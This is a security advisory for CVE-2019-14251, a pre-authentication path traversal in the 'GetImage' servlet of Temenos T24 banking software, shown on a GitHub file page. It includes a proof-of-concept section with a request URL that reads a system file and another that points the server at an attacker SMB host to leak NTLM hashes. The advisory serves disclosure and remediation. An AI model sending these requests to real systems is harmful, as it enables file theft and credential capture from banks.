Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
exploit/CVE-2019-14251-TEMENOS-T24.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
106 lines (80 sloc)
4.4 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################### | |
| # | |
| # Pre-Authenticated Path Traversal in "GetImage" Java servlet (cwe-36) | |
| # | |
| ############################################################### | |
| # | |
| # Publication date: to be defined | |
| # | |
| # Author: | |
| # Bourbon Jean-marie (@kmkz_security) - Hacknowledge | |
| # jean-marie@hacknowledge.lu | |
| # | |
| # Product Homepage: https://www.temenos.com/en/solutions/transact/core-banking-software/ | |
| # Source code download: N/A | |
| # | |
| # Tested on : | |
| # Version: Build Version R15.01 | |
| # | |
| ############################################################### | |
| # Pre-Authenticated Path Traversal (cwe-36) | |
| # | |
| # CVSSv3 : 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N) | |
| # OVE ID: OVE-20190724-0001 | |
| # CVE ID: CVE-2019-14251 | |
| # | |
| ############################################################### | |
| # Fixes: | |
| # No known available fix yet | |
| ############################################################### | |
| I. PRODUCT | |
| TEMENOS T24 is the most technically advanced banking system available today. | |
| It combines the most comprehensive and flexible business functionality with the most advanced and scalable architecture. | |
| This gives it unprecedented power to meet the challenges of today and the opportunities of tomorrow. | |
| II. ADVISORY | |
| An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the | |
| T24 web server. | |
| Using this weakness, an attacker might download any file including sensitive containing credential (mgmt-users.properties) or | |
| use it to exfiltrate NTLM hashes using an SMB query to an attacker controlled server in order to compromise it. | |
| III. VULNERABILITY DESCRIPTION | |
| The login page present some juicy JavaScript function that call a servlet used to access some document on the server once successfully authenticated (in theory). | |
| This weakness allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. | |
| As presented below, the "downloadDocServer()" show that the "GetImage" Java servlet use an insecure parameter to download a document a malicious person could use to access file by exploiting a path traversal without | |
| the need to be authenticate within the T24 application. | |
| function downloadDocServer() | |
| { | |
| pdfDownloadPath = escape(unescapeString("")); | |
| pdfDownloadLocation = escape(unescapeString("")); | |
| try | |
| { | |
| // the path used below is vulnerable to CWE-36 (path traversal) vulnerability permitting to extract NTLM hashes or access any file on the server's filesystem | |
| openWindow=window.open('/WealthT24/GetImage?docDownloadPath='+pdfDownloadPath+'&uploadLocation='+pdfDownloadLocation+'','RafPrintWin',type="application/pdf",'toolbar=0,location=0,left=100,top=100,width=800,height=800'); | |
| openWindow.focus(); | |
| } | |
| catch (e) | |
| { | |
| alert("Either popup blocker is enabled or file cannot be downloaded for viewing at this moment."); | |
| } | |
| } | |
| IV. PROOF OF CONCEPT | |
| a) File accessing: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini | |
| b) NTLM hashes extraction: http://T24BankingApplication/WealthT24/GetImage?docDownloadPath=\\192.168.19.135\test | |
| V. RECOMMENDATIONS | |
| The application should validate the user input before processing it. | |
| Ideally, the validation should compare against a white-list of permitted values. | |
| If that isn't possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters. | |
| After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path. | |
| It should verify that the canonicalized path starts with the expected base directory. | |
| VI. TIMELINE | |
| July 23th, 2019: Vulnerability identification | |
| July 24th, 2019: First contact with the editor (TEMENOS Team) | |
| July 25th, 2019: CVE attribution | |
| July 29th, 2019: Vulnerability acknowledgement + fix release from Temenos | |
| August 1st, 2019: Patch released to customers | |
| August 12th, 2019: First advisory released | |
| August 19th, 2019: Temenos asked publication removal | |
| September 04th, 2019: Temenos informed that responsible disclosure delay (45 days) will expire next day | |
| December 05th, 2019: Advisory released | |
| VIII. LEGAL NOTICES | |
| The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. | |
| I accept no responsibility for any damage caused by the use or misuse of this advisory. |